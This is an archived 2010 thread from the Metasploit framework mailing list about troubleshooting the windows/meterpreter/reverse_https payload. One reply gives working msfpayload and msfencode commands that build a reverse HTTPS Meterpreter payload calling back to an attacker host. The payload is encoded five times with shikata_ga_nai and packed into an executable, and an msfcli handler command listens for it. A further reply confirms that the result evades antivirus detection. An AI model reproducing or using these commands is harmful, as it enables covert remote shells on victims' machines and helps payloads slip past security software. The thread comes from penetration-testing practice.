List: metasploit-framework
Subject: Re: [framework] windows/meterpreter/reverse_https still working
From: wfdawson <wfdawson () bellsouth ! net>
Date: 2010-11-16 21:24:17
Message-ID: 935134.43210.qm () web180409 ! mail ! gq1 ! yahoo ! com
With the exception of the "payload=shikata_ga_nai" mention on the msfcli line, I was
happy to see that not only do the below steps avoid any detection by my AV, but
it is also substantially faster to load than the equivalent multi-staged
Meterpreter payload.
Thanks for the tip!
________________________________
From: Marc Doudiet <marc.doudiet@gmail.com>
To: framework@spool.metasploit.com
Sent: Tue, November 16, 2010 3:54:20 PM
Subject: Re: [framework] windows/meterpreter/reverse_https still working
Hi,
I just used it today and it worked like a charm:
./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R | ./msfencode -t exe -x test.exe -o test.exe -e x86/shikata_ga_nai -c 5
./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx lport=443 payload=windows/meterpreter/reverse_https E
Hope this helps.
M
On Nov 16, 2010, at 4:31 PM, Miguel Rios wrote:
>I've also had issues lately with windows/meterpreter/reverse_https where it
>seems to start the connection and then hangs with no error messages. Regular old
>reverse_http works without a hitch and obviously 443 is allowed through the
>firewall so I think it may be a problem with meterpreter itself. I'd appreciate
>it if others could give feedback if they're seeing the same issues with latest
>svned up metasploit before I spend an afternoon testing it further.
>
>Thanks
>
>--- On Sat, 10/30/10, Jeffs <jeffs@speakeasy.net> wrote:
>
>
>>From: Jeffs <jeffs@speakeasy.net>
>>Subject: [framework] windows/meterpreter/reverse_https still working
>>To: "framework@spool.metasploit.com" <framework@spool.metasploit.com>
>>Date: Saturday, October 30, 2010, 12:42 PM
>>
>>
>>Hello All,
>>
>>Does the windows/meterpreter/reverse_https still work in this day and age?
>>I am having difficulty getting it to connect back to an IE 7 instance using
>>the example here:
>>http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html
>>
>>I see through tcpdump that the connection is being requested but nothing
>>happens in the exploit/multi/handler.
>>
>>Also, I cannot get the msfencode to work. Receive message no such file or
>>directory "msfencode" even though I see it in plain sight.
>>
>>Thank you.
>>
>>
>>-----Inline Attachment Follows-----
>>
>>
>>_______________________________________________
>>https://mail.metasploit.com/mailman/listinfo/framework
>>
>_______________________________________________
>https://mail.metasploit.com/mailman/listinfo/framework
>